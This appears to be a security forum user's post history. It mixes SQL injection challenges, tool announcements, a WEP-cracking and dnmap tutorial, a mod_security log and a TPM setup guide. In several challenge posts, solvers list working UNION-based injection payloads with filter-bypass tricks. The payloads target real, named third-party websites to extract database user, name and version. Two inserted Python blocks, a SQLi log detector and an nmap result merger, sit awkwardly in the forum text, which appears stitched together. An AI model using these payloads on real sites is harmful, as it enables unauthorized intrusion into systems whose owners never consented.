Wubi

Active Members
  • Posts

    893
  • Joined

  • Last visited

  • Days Won

    17

Everything posted by Wubi

  1. It's ok, congratulations; that bypass had no purpose there, otherwise it's fine.
  2. I'm also waiting for a PM with the syntax. This solution is good too; I would have liked the output as in the proof, but it's ok.
  3. So... Target: LE POCHE. Method: Union Based. Requirements: User(), Database() or Version(). Proof: The site was found by Sheyken and my mouth was watering until I realised it wasn't really that hard.

     Solvers and syntax:
     Sheyken: -
     kl0w: ?rubID=-2%20+/*!50000UnIoN*/%20/*!50000SeLeCt%20aLl*/+%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat%280x5645525349554e4541,0x3a,version%28%29,0x3a,0x4d657273692070656e74727520636f6d70657469746965%20%29,17--
     Sweby: ?rubID=2 and 1=0 UNION SELECT null,null,0x5377656279,0x3a292920416d206761736974206e656e6f726f63697461,null,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),null,null,null,null,null,null,null,null,null,null,null--+
     ak4d3a: ?rubID=2+and+1=2+UnIoN+SeLeCt+1,2,version(),User(),5,Database(),7,8,9,10,11,12,13,14,15,null,17--
     neo.hapsis: ?rubID=2+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(user(),database(),version()),17--
     gafi: ?rubID=2+AND+1=2+UNION+SELECT+concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version())--
     badluck: ?spectaclesID=36 UNION ALL SELECT concat(database(),0x3a,user(),0x3a,version()),2,3,4,5,6--
  4. If you had followed the previous challenges (https://rstcenter.com/forum/59702-easy-sqli-2-a.rst ; https://rstcenter.com/forum/59689-easy-tricky-sqli.rst), or looked more carefully at the solvers table in the first post, the 2nd row is dedicated to the syntaxes used. When I decide to end the challenge I will add the syntaxes too. Until then keep trying; hint: bypass.
  5. Published on Oct 5, 2012 by TheSecurityTube. No description available. Source: YouTube
  6. https://www.youtube.com/watch?v=N5M-3MWl-4s&feature=g-u-u
     Published on Oct 3, 2012 by metasploit619. Description: Webacoo.pl download: Download webacoo.pl from Sendspace.com - send big files the easy way. Visit my page on facebook: BackTrack Linux fan page | Facebook. Surprise: By Cyb3rw0rM. TUTORIAL By Cyb3rw0rM. CONTACT ME: Cyb3rw0rm@hotmail.com. Source: YouTube
  7. No... Target: News: Scene sexy per Alanis - Newsic. Method: Union Based. Requirements: User(), Database() or Version(). Proof: The site was found by Sheyken...

     Solvers and syntax:
     Sheyken: +union%0Aselect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- /* and */ ?id=-25890+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--
     fallen_angel: ?id=-25890+uNion+/*!se%6cect*/+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+-
     neo.hapsis: ?id=null%0Dunion%0Dselect+1,2,3,4,5,NULL,0x3c623e6e656f2e686170736973,0x7468616e6b7320666f7220746865206368616c6c656e6765,9,10,11,12,13,14,group_concat(user(),0x3a,database(),0x3a,version()),16,17,18,19,20,21,22,23,24,25,26,NULL,28,29,30--
     Sweby: ?id=25890+and+1=2+UNION%0BSELECT+1,2,3,4,5,user(),group_concat(version(),0x3a,database()),8,9,10,11,12,13,14,concat(0x49206861746520746f20627970617373207468696e6773),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+/*
  8. The challenge has ended and the syntaxes have been updated. I will make a few more, somewhat harder. On another note, closed.
  10. Wubi: Deleted.

     I'm on the right way, I may do it for you with a complete solution until the end of this weekend. /* Sorry for the late or missing responses, I had some problems that took a lot of my time. */
  11. ==c5ec995b==============================
      Request: 213.21.217.206 190.196.9.138 - - [15/Feb/2009:15:26:10 +0200] "GET /bug/login_page.php HTTP/1.1" 403 220 "-" "Toata dragostea mea pentru diavola" A2x6cn8AAAIAAEygTEwAAAAs "-"
      Handler: redirect-handler
      ----------------------------------------
      GET /bug/login_page.php HTTP/1.1
      Accept: */*
      Accept-Language: en-us
      Accept-Encoding: gzip, deflate
      User-Agent: Toata dragostea mea pentru diavola
      Host: 213.21.217.206
      Connection: Close
      mod_security-message: Access denied with code 403. <rule is hidden> [severity "EMERGENCY"]
      mod_security-action: 403

      HTTP/1.1 403 Forbidden
      Content-Length: 220
      Connection: close
      Content-Type: text/html; charset=iso-8859-1

      --c5ec995b--
  12. This tool is very useful for system admins and system auditors who gather system information centrally, and for people who are looking for in-depth details about their personal computers. Are you one of them? SIV is a perfect tool that gives you a lot of detail about your system, and it goes beyond the typical information provided elsewhere. The information it can show includes: network and hardware info, information about Windows, CPU, PCI, PCMCIA, USB, SMBus, and much more. SIV is a portable tool that comes in a zip file; you don't need to install it. Simply extract it and run the executable that fits your system, i.e. SIV32X for 32-bit users or SIV64X for 64-bit users. SIV is fast and easy to use: open up the application and you will be presented with complete system information. The main page shows system information and the tabs underneath show information about the components mentioned above. For troubleshooting, and to start with, SIV is a handy tool. It supports almost all Windows operating systems, even 8. Download SIV: SIV – reg-organizer-setup.exe. Source: PenTestIT
  13. DEFCON 20 Blind XSS Demo by &yet PRO, 1 month ago. Demonstration that Adam Baldwin did at DEFCON 20 using xss.io to identify blind XSS vectors, quickly build reusable exploits and use the referer redirect feature to shorten payload length. Source: Vimeo
  14. Meh... Target: Tattoos by Bryan. Method: Union Based. Requirements: User(), Database(), Version(). Proof: The site is also taken from a challenge on HF.

     Solvers (syntax added after the challenge closed):
     ps-axl: ?id=-45 union all select CONCAT(0x223e, version(), 0x3c212d2d),2--
     Sheyken: ?id=-45 union all select version(),2-- / or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1--
     badluck: ?id=52 and 1=2 union all select concat(User(),0x3a,Database(),0x3a,Version()),2--
     DarkyAngel: ?id=-45 union all select CONCAT(0x223e,user(), 0x207c20, database(), 0x207c20, version(), 0x3c212d2d),2--

     Solvers 2 (syntax added after the challenge closed):
     c0unt3rlog1c: ?imagetable=gallery&imageid=1+union+all+select+1,concat(user(),0x3a,database(),0x3a,version())--
     Ciresel21: ?id=1 UNION SELECT Version(),2-- -
     Toshib4: ?imagetable=pictures&imageid=-1 union all select 1,version()--
     wHoIS: -

     Solvers 3 (syntax added after the challenge closed):
     neo.hapsis: ?id=(52) and (0) union select concat(0x223e,User(),0xba,Database(),0xba,Version( ),0x3c6120687265663d22),2--+- /*and*/ ?id=(52) and (0) union select concat(User(),0xba,Database(),0xba,Version()),2--+-
     vpatrikv: ?id=6+union+all+select+concat(0x20,User(),0x20,Database(),0x20,Version()),2--
     co4ie: ?imagetable=gallery&imageid=-45 and 1=1 uNiOn aLl sElEct 1,concat(user(),0x3a,Database(),0x3a,@@Version)--
     Sweby: -
  15. Oh yes, I got seriously bored. Target: Tense : SchoolNet Thailand. Method: Union Based. Requirements: User(), Database(), Version(). Proof: The site is taken from another challenge on HF.

     Solvers (syntax added after the challenge closed):
     Sheyken: UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135--
     DarkyAngel: UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135--
     wHoIS: -
     neo.hapsis: UNION SELECT 1,2,3,concat(user(),0x7c,database(),0x7c,version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135--

     Solvers 2 (syntax added after the challenge closed):
     badluck: -
     Co4ie: and 1=1 UNION SELECT 1,2,3,group_concat(User(),0x3a,Database(),0x3a,Version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135--
     Sweby: -
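The solver syntaxes in the four challenge posts above (items 3, 7, 14 and 15) all rely on the same handful of evasions: URL encoding, MySQL `/*!50000...*/` conditional comments, and `%0A`/`%0B`/`%0D` in place of spaces. The detector below is an added example (not code from the forum or from any solver) that undoes those evasions before looking for UNION-based probing in web-server access logs; the log lines it runs on are constructed here and the scoring thresholds are this example's own choice.

```python
"""Flag UNION-based SQL injection probes in access logs, after undoing the
obfuscations used in the challenge syntaxes (encoding, /*!...*/, odd whitespace)."""
import re
from urllib.parse import unquote_plus

# Combined log format: client ip ... "METHOD target PROTO" status ...
_LOG = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
_COND_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)   # /*!50000UnIoN*/ -> UnIoN
_PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)           # /**/ used as a separator
_WS = re.compile(r"\s+")                                  # \n \v \r \t all become one space
_UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b")
_FINGERPRINT = re.compile(r"\b(?:version|user|database|concat_ws|group_concat)\s*\(|@@version")
_COLUMNS = re.compile(r"\b(?:\d+|null)(?:\s*,\s*(?:\d+|null)){2,}")   # 1,2,3,... column probing
_TERMINATOR = re.compile(r"--|#")

def normalize(query):
    """Decode and canonicalise a query string so obfuscated and plain forms compare equal."""
    s = unquote_plus(query)
    if "%" in s:                       # one level of double encoding
        s = unquote_plus(s)
    s = _COND_COMMENT.sub(r"\1", s)    # keep what hides inside MySQL version comments
    s = _PLAIN_COMMENT.sub(" ", s)
    s = _WS.sub(" ", s)
    return s.strip().lower()

def classify_query(query):
    """Return (verdict, reasons) for one raw query string."""
    q = normalize(query)
    reasons = []
    if _UNION_SELECT.search(q):
        reasons.append("union-select")
    if _FINGERPRINT.search(q):
        reasons.append("fingerprint-function")
    if _COLUMNS.search(q):
        reasons.append("column-enumeration")
    if _TERMINATOR.search(q):
        reasons.append("comment-terminator")
    if "union-select" not in reasons:
        # version()/user()/database() without UNION is worth a look (error-based probes)
        return ("suspicious" if "fingerprint-function" in reasons else "clean", reasons)
    # "union select" alone also occurs in ordinary text ("trade union select committee"),
    # so a second indicator is required before calling it an attack.
    return ("attack" if len(reasons) > 1 else "suspicious", reasons)

def classify_line(line):
    """Classify one access-log line; returns ip, target, verdict and reasons."""
    m = _LOG.match(line)
    if not m:
        return {"ip": None, "target": None, "verdict": "unparsed", "reasons": []}
    target = m.group("target")
    _, _, query = target.partition("?")
    verdict, reasons = classify_query(query)
    return {"ip": m.group("ip"), "target": target, "verdict": verdict, "reasons": reasons}

def scan(lines):
    return [classify_line(line) for line in lines if line.strip()]

# Constructed sample log: one normal request, four probes using the evasions seen
# in the challenge syntaxes, and one benign false-positive candidate.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Oct/2012:10:12:01 +0300] "GET /news.php?id=25890 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Oct/2012:10:12:07 +0300] "GET /news.php?id=-25890+uNion+/*!se%6cect*/+1,2,@@version-- HTTP/1.1" 200 4871 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Oct/2012:10:12:09 +0300] "GET /news.php?id=null%0Dunion%0Dselect+1,2,group_concat(user(),0x3a,database())-- HTTP/1.1" 200 4902 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Oct/2012:10:12:15 +0300] "GET /rub.php?rubID=-2%20+/*!50000UnIoN*/%20/*!50000SeLeCt%20aLl*/+1,2,version%28%29-- HTTP/1.1" 200 4890 "-" "Mozilla/5.0"
10.0.0.7 - - [05/Oct/2012:10:13:00 +0300] "GET /search.php?q=trade+union+select+committee HTTP/1.1" 200 3300 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Oct/2012:10:13:21 +0300] "GET /news.php?id=2+and+1=2+UnIoN+SeLeCt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,null,17-- HTTP/1.1" 200 4871 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(r["ip"], r["verdict"], r["reasons"])
```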
  16. Published on Sep 29, 2012 by BallastSecurity. Description: An example of a single vulnerability in the Archin WordPress theme leading to the complete compromise of a WordPress blog. Narrated, discovered and developed by bwall of Ballast Security. Music by DigiP. Source: YouTube
  17. https://www.youtube.com/watch?v=uuqeCS50g48&feature=g-u-u Source: YouTube
  18. Backtrack is one of the most popular Linux distributions used for penetration testing and security auditing. The Backtrack development team is sponsored by Offensive Security. On 13th August 2012, Backtrack 5 R3 was released. This included the addition of about 60 new tools, most of which were released during the Defcon and Blackhat conferences held in Las Vegas in July 2012. In this series of articles, we will look at most of the new tools that were introduced with Backtrack 5 R3 and at their usage. Some of the notable changes included tools for mobile penetration testing, GUI tools for Wi-Fi cracking and a whole new category of tools called Physical Exploitation.

     Getting Backtrack 5 R3

     There are two ways to get up and running quickly with Backtrack 5 R3. If you are already running Backtrack 5 R2, you can upgrade to Backtrack 5 R3 by following the steps described on the upgrade page (see the references). Or you can do a fresh install of Backtrack 5 R3 from the downloads section on Backtrack's official website.

     According to Backtrack's official website, the new tools released with Backtrack 5 R3 are: libcrafter, blueranger, dbd, inundator, intersect, mercury, cutycapt, trixd00r, artemisa, rifiuti2, netgear-telnetenable, jboss-autopwn, deblaze, sakis3g, voiphoney, apache-users, phrasendrescher, kautilya, manglefizz, rainbowcrack, rainbowcrack-mt, lynis-audit, spooftooph, wifihoney, twofi, truecrack, uberharvest, acccheck, statsprocessor, iphoneanalyzer, jad, javasnoop, mitmproxy, ewizard, multimac, netsniff-ng, smbexec, websploit, dnmap, johnny, unix-privesc-check, sslcaudit, dhcpig, intercepter-ng, u3-pwn, binwalk, laudanum, wifite, tnscmd10g, bluepot, dotdotpwn, subterfuge, jigsaw, urlcrazy, creddump, android-sdk, apktool, ded, dex2jar, droidbox, smali, termineter, bbqsql, htexploit, smartphone-pentest-framework, fern-wifi-cracker, powersploit, and webhandler. We will be discussing most of these tools in this series.

     Fern-Wifi-Cracker

     Fern Wi-Fi Cracker is a program written in Python that provides a GUI for cracking wireless networks. Normally, you need to run aireplay-ng, airodump-ng and aircrack-ng separately in order to crack wireless networks, but Fern-Wifi-Cracker makes this job very simple by acting as a facade over these tools and hiding the intricate details. It also comes with a bunch of tools that help you perform attacks like session hijacking, locating a particular system's geolocation based on its MAC address, etc. Fern Wi-Fi Cracker can be found under the category Wireless Exploitation tools, as shown in the figure below.

     Before starting with Fern Wi-Fi Cracker, make sure that you have a Wi-Fi card that supports packet injection. In my case, I am running Backtrack 5 R3 as a VM and I have connected an external Alfa Wi-Fi card to it. You can verify whether your card can be put into monitor mode by just typing airmon-ng; it will show you the list of interfaces that can be put in monitor mode. Once this is done, open up Fern Wi-Fi Cracker. Select the interface on which you want to sniff. Once you have selected it, it will automatically create a virtual interface (mon0) on top of the selected interface (wlan0), as is clear from the image below.

     Now, click on "Scan for access points". As you can see from the results, it found 4 networks with WEP and 1 network with WPA. In this case, we will be cracking a WEP network named "Infosec test" which I set up for testing purposes. Click on the network "Infosec test" and it will show you its specific information, like the BSSID of the access point, the channel on which the access point is transmitting, etc. On the bottom right, you can select from a variety of attacks like the ARP request replay attack, caffe latte attack, etc. In my case, I will be going for an ARP request replay attack. Once this is done, click on "Wi-fi attack" and this will start the whole process of cracking WEP.

     You will now see that some IVs are being captured, as shown in the image below. The tool will also tell you whether your card is injecting ARP packets properly or not, as shown in the bottom right section of the image below. Once enough IVs have been collected, it will start cracking the WEP key automatically. Similarly, Fern Wi-Fi Cracker can be used to crack WPA. It just makes the whole process so simple. It also provides some extra functionality for hijacking sessions and locating a computer's geolocation via its MAC address. I recommend you check it out.

     Dnmap

     Imagine you have to scan a huge network containing thousands of computers. Scanning via nmap from a single computer will take quite a long time. Dnmap was created to solve this problem. Dnmap is a framework that follows a client/server architecture. The server issues nmap commands to the clients and the clients execute them. In this way, the load of performing such a large scan is distributed among the clients. The commands that the server gives to its clients are put in a command file. The results are stored in a log file which is saved on both the server and the client.

     The whole process of running Dnmap follows these steps:
     1. Create a list of commands that you want to run and store it in a file, say commands.txt.
     2. Note the IP address of the server.
     3. Run the dnmap server and give the commands file as an argument.
     4. Connect the clients to the server. Note that the server should be reachable from the client.

     Let's do the demo now. I have 2 virtual machines, both running Backtrack 5 R3. I am going to run the Dnmap server on one of the virtual machines and a client on the second one. Open dnmap under the category Information Gathering -> Network Analysis -> Identify Live Hosts. The next step is to create a commands.txt file. As you can see from the image below, I have 3 commands in the commands.txt file. Now type the command shown in the image below to start the dnmap server.

     I have started the dnmap server to listen on port 800. As you can see, it currently detects no clients. Hence the next step is to get some clients to connect to this dnmap server. It is also better to specify the location of the log file that will hold all the results. On my other BT machine, I run the following command to connect the client to the server. Note that the internal IP address of my dnmap server is 10.0.2.15, and since my other virtual machine is in the same internal network, it is able to reach the server. You also need to specify the port on the server to which you are connecting. Optionally, you can specify an alias for the client.

     Once the client establishes a connection with the server, you will see that the client starts executing the commands that it is getting from the server. On the server side, you will notice that it recognizes this client and shows it in the output. It also keeps giving you regular information like the number of commands executed, uptime, online status, etc. Once the scans are completed, dnmap stores the results in a directory named nmap_output. The results are saved in .nmap, .gnmap and .xml formats. There are separate output files for each command. It is advisable to clear all the previous files in the nmap_output directory, or save them somewhere else, before starting a new scan. Here is what a sample response file looks like.

     In this article, we looked at a couple of the most popular tools that were introduced with Backtrack 5 R3. In further articles in this series, we will discuss many other new tools that were shipped with Backtrack 5 R3. If there is a particular tool that you want me to write about, or if you have any questions, comments or suggestions regarding this series, please write them down in the comments below.

     References:
     Upgrade from Backtrack 5 R2 to R3: http://www.backtrack-linux.org/backtrack/upgrade-from-backtrack-5-r2-to-backtrack-5-r3/
     Fern-Wifi-Cracker: fern-wifi-cracker - Fern wifi cracker for wireless penetration testing (Google Project Hosting)
     Dnmap framework official page: dnmap (SourceForge.net)
     Source: InfoSec Resources
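Dnmap leaves one .nmap/.gnmap/.xml triple per command in nmap_output, so the results of a distributed scan have to be merged before they can be reviewed. The script below is an added example (not part of the article or of the dnmap project) that parses the grepable .gnmap files and merges them into one host/port inventory; the two .gnmap files it contains are constructed, and the addresses and hostnames in them are made up.

```python
"""Merge the per-command .gnmap files dnmap writes to nmap_output/ into one inventory."""
import glob
import os

# Two constructed .gnmap files, as if produced by two dnmap clients running two commands
# (nmap -oA writes this grepable format; the scan data below is invented).
SAMPLE_GNMAP = {
    "cmd1.gnmap": (
        "# Nmap 6.01 scan initiated Fri Oct  5 10:00:00 2012 as: nmap -sS -p 22,80,443 -oA nmap_output/cmd1 10.0.2.0/24\n"
        "Host: 10.0.2.15 ()\tStatus: Up\n"
        "Host: 10.0.2.15 ()\tPorts: 22/open/tcp//ssh//OpenSSH 5.9p1/, 80/open/tcp//http//Apache httpd 2.2.22/, 443/closed/tcp//https///\tIgnored State: closed (0)\n"
        "Host: 10.0.2.20 (fileserver.lab)\tStatus: Up\n"
        "Host: 10.0.2.20 (fileserver.lab)\tPorts: 445/open/tcp//microsoft-ds///\n"
        "# Nmap done at Fri Oct  5 10:00:12 2012 -- 256 IP addresses (2 hosts up) scanned in 12.30 seconds\n"
    ),
    "cmd2.gnmap": (
        "# Nmap 6.01 scan initiated Fri Oct  5 10:00:01 2012 as: nmap -sU -p 53,161 -oA nmap_output/cmd2 10.0.2.0/24\n"
        "Host: 10.0.2.15 ()\tStatus: Up\n"
        "Host: 10.0.2.15 ()\tPorts: 161/open/udp//snmp///, 53/closed/udp//domain///\n"
        "Host: 10.0.2.30 ()\tStatus: Down\n"
        "# Nmap done at Fri Oct  5 10:00:40 2012 -- 256 IP addresses (1 host up) scanned in 39.10 seconds\n"
    ),
}

def parse_gnmap(text):
    """Return {ip: {"hostname", "status", "ports": {(port, proto): (state, service, version)}}}."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                      # '# Nmap ...' header and footer lines
        fields = line.split("\t")
        _, addr_part = fields[0].split(" ", 1)        # "10.0.2.15 (name)"
        ip, _, rest = addr_part.partition(" ")
        hostname = rest.strip("() ")
        entry = hosts.setdefault(ip, {"hostname": hostname, "status": "", "ports": {}})
        for field in fields[1:]:
            key, _, value = field.partition(": ")
            if key == "Status":
                entry["status"] = value
            elif key == "Ports":
                for spec in value.split(", "):
                    # port/state/protocol/owner/service/rpc-info/version/
                    port, state, proto, _owner, service, _rpc, version = spec.split("/")[:7]
                    entry["ports"][(int(port), proto)] = (state, service, version)
    return hosts

def merge(parsed_files):
    """Merge several parse_gnmap() results: ports accumulate, and 'Up' wins over 'Down'."""
    inventory = {}
    for hosts in parsed_files:
        for ip, entry in hosts.items():
            merged = inventory.setdefault(ip, {"hostname": "", "status": "Down", "ports": {}})
            merged["hostname"] = merged["hostname"] or entry["hostname"]
            if entry["status"] == "Up":
                merged["status"] = "Up"
            merged["ports"].update(entry["ports"])
    return inventory

def open_ports(inventory):
    """Flat, sorted list of (ip, port, proto, service) for open ports only."""
    return sorted((ip, port, proto, svc)
                  for ip, e in inventory.items()
                  for (port, proto), (state, svc, _ver) in e["ports"].items()
                  if state == "open")

def load_output_dir(path):
    """Parse and merge every *.gnmap file in a dnmap nmap_output directory."""
    parsed = []
    for name in sorted(glob.glob(os.path.join(path, "*.gnmap"))):
        with open(name, encoding="utf-8", errors="replace") as fh:
            parsed.append(parse_gnmap(fh.read()))
    return merge(parsed)

def demo():
    """Merge the two constructed files above."""
    return merge(parse_gnmap(t) for t in SAMPLE_GNMAP.values())

if __name__ == "__main__":
    for ip, port, proto, svc in open_ports(demo()):
        print(f"{ip:<12} {port}/{proto} {svc}")
```

Point load_output_dir at a real nmap_output directory to merge an actual dnmap run.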
  19. 1. Initializing the TPM

     To secure our data we must first initialize the TPM. What we're actually doing is changing the settings of the hardware TPM chip on the computer motherboard itself. First we must initialize the physical TPM chip with the tpm_clear command, which returns the TPM to its default state: unowned, disabled and inactive. That command wipes all the ownership information from the TPM, invalidates all the keys and data tied to the TPM, and even disables and deactivates the TPM. We must remember that the TPM won't actually be used to encrypt/decrypt our data on the hard drive; it is just hardware that holds the secret keys used by the software component, which does the encryption and decryption on the fly. The TPM is primarily used to check during boot whether the kernel is unmodified, because otherwise an attacker could replace our kernel with a malicious one, since the /boot partition is not encrypted when used with LUKS. But the TPM does not check the integrity of the kernel only; it also checks the integrity of all BIOS components, the bootloader and other OS components.

     1.1. Clearing the TPM

         # tpm_clear --force
         Tspi_TPM_ClearOwner failed: 0x00000007 - layer=tpm, code=0007 (7), TPM is disabled

     We can see that the TPM is disabled, which is why we can't clear it. This can happen if we forget to enable the TPM in the BIOS, so the first thing to do is to enable the TPM in the BIOS. If the TPM has been initialized before, we receive the output seen below:

         # tpm_clear --force
         TPM Successfully Cleared. You need to reboot to complete this operation. After reboot the TPM will be in the default state: unowned, disabled and inactive.

     This requires us to reboot the computer for the changes to take effect. When clearing the TPM we return it to the default state, which is unowned, disabled and inactive, as already mentioned. To enable the TPM afterwards, we need the owner password. But since the TPM owner has been cleared, there is no owner password and we can set a new one without entering the old one. We can also receive an error like the following:

         # tpm_clear --force
         Tspi_TPM_ClearOwner failed: 0x0000002d - layer=tpm, code=002d (45), Bad physical presence value

     This happens because we can't clear the TPM from the Linux system, only from the BIOS. This is a security limitation that prevents any user from clearing the TPM.

     1.2. Owning the TPM

     We must also own the TPM to protect our data. Owning the TPM means setting the password that ensures that only the authorized user can access and manage the TPM. This password is also used when we want to turn off the TPM, disable the TPM, clear the TPM, etc., so we must always remember it. The TPM is shipped in an unowned state. We must set two passwords. The first is the owner (administration) password, which is used for administering the TPM, and the second is the SRK (Storage Root Key) password, which is needed whenever we load a key into the TPM. We can set both passwords with the tpm_takeownership command, as can be seen below:

         # tpm_takeownership
         Enter owner password:
         Confirm password:
         Enter SRK password:
         Confirm password:

     If we later want to change either of the passwords, we can do it with the tpm_changeownerauth command. If we pass the --owner argument to tpm_changeownerauth we change the owner password, and if we pass --srk we change the SRK password. We can see an example of both commands in the output below:

         # tpm_changeownerauth --owner
         Enter owner password:
         Enter new owner password:
         Confirm password:

         # tpm_changeownerauth --srk
         Enter owner password:
         Enter new SRK password:
         Confirm password:

     There are 5 keys in the TPM:
     - Endorsement Key (EK): This key is created by the manufacturer and cannot be removed. Sometimes it can be changed by the owner of the computer.
     - Storage Root Key (SRK): The 2048-bit RSA key created when taking ownership. This key is stored inside the chip and can be removed. It is used to encrypt the Storage Key (SK) and the Attestation Identity Key (AIK).
     - Storage Key (SK): This key is created during initialization and is used to encrypt other elements in the TPM hierarchy, presumably the Binding Key (BK).
     - Binding Key (BK): This key is used to encrypt small data blocks used by the TPM.
     - Attestation Identity Key (AIK): This key is used for exchanges with the TPM; it allows applications to authenticate the TPM.

     To enable the TPM we must run the tpm_setenable and tpm_setactive commands as below. If we pass the --force option to either of those commands, it will try to use physical presence authorization to execute the command. Most TPM operations require owner authorization, but physical presence allows us to use certain TPM functions without the owner password. Of course, physical presence does not allow us to reveal the TPM owner password, which would break confidentiality.

         # tpm_setenable --enable
         Enter owner password:
         Disabled status: false

         # tpm_setactive
         Enter owner password:
         Persistent Deactivated Status: false
         Volatile Deactivated Status: false

     The Endorsement Key (EK) has two parts: the public and the private one. The private key is always stored in the TPM and cannot be seen by anyone, while the public key can be displayed with the tpm_getpubek command.

         # tpm_getpubek
         Tspi_TPM_GetPubEndorsementKey failed: 0x00000008 - layer=tpm, code=0008 (8), The TPM target command has been disabled
         Enter owner password:
         Public Endorsement Key:
           Version: 01010000
           Usage: 0x0002 (Unknown)
           Flags: 0x00000000 (!VOLATILE, !MIGRATABLE, !REDIRECTION)
           AuthUsage: 0x00 (Never)
           Algorithm: 0x00000020 (Unknown)
           Encryption Scheme: 0x00000012 (Unknown)
           Signature Scheme: 0x00000010 (Unknown)
           Public Key:
             a350b3a3 3edddc30 06248f4f 5d3eb80a 34fcbea0 83dde002 8dffa703 e116f8b0
             eb1962ee a65998b3 384aeb6e 85486be9 0316a6ca a189a5ba 2217b2a2 9da014db
             dfbe7731 fb675e7a 438c4775 deea54fb 0c75de5d ba961950 3eda4555 d27a9a30
             e94d39d0 a4ea314d a70eaf08 e49dd354 d57ed34d 234220d9 604471a9 86173050
             9ff9b0e5 b65cb4b5 5f46a7f9 4378bd7e 8c61b91b ad312974 fef5d70f 84f4484f
             e5c95300 0eef76f2 1667443f dc2fa82e 351d945e 6b5f75e8 828d010f 61541552
             [...]

     2. TrustedGRUB

     TrustedGRUB is an extension of the normal GRUB boot loader, modified to support the TPM. We can use TrustedGRUB to connect to the TPM, measure the binary configuration and store the resulting measurements in the Platform Configuration Registers (PCRs) of the TPM. These registers can then be used to verify the software configuration running on the TPM-enabled platform. We can list the PCR values by printing the file /sys/class/misc/tpm0/device/pcrs. An example of such output can be seen below:

         # cat /sys/class/misc/tpm0/device/pcrs
         PCR-00: AD B5 A1 6B F5 42 CA 9D 0F EA 7A 60 94 81 53 F8 E0 42 E6 B6
         PCR-01: 3A 3F 78 0F 11 A4 B4 99 69 FC AA 80 CD 6E 39 57 C3 3B 22 75
         PCR-02: 0E AA F8 1E 92 C7 84 F9 9C BB C1 D3 72 12 9D DD DA 30 6E 5A
         PCR-03: 3A 3F 78 0F 11 A4 B4 99 69 FC AA 80 CD 6E 39 57 C3 3B 22 75
         PCR-04: 47 0E D4 44 DE 46 2C FC 17 5E 3C 68 8D 79 A3 2B 97 30 DF 13
         PCR-05: 81 96 5F 15 B0 6D 54 56 18 FA E1 51 F1 48 B3 02 D5 08 E9 21
         PCR-06: 3A 3F 78 0F 11 A4 B4 99 69 FC AA 80 CD 6E 39 57 C3 3B 22 75
         PCR-07: 3A 3F 78 0F 11 A4 B4 99 69 FC AA 80 CD 6E 39 57 C3 3B 22 75
         PCR-08: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
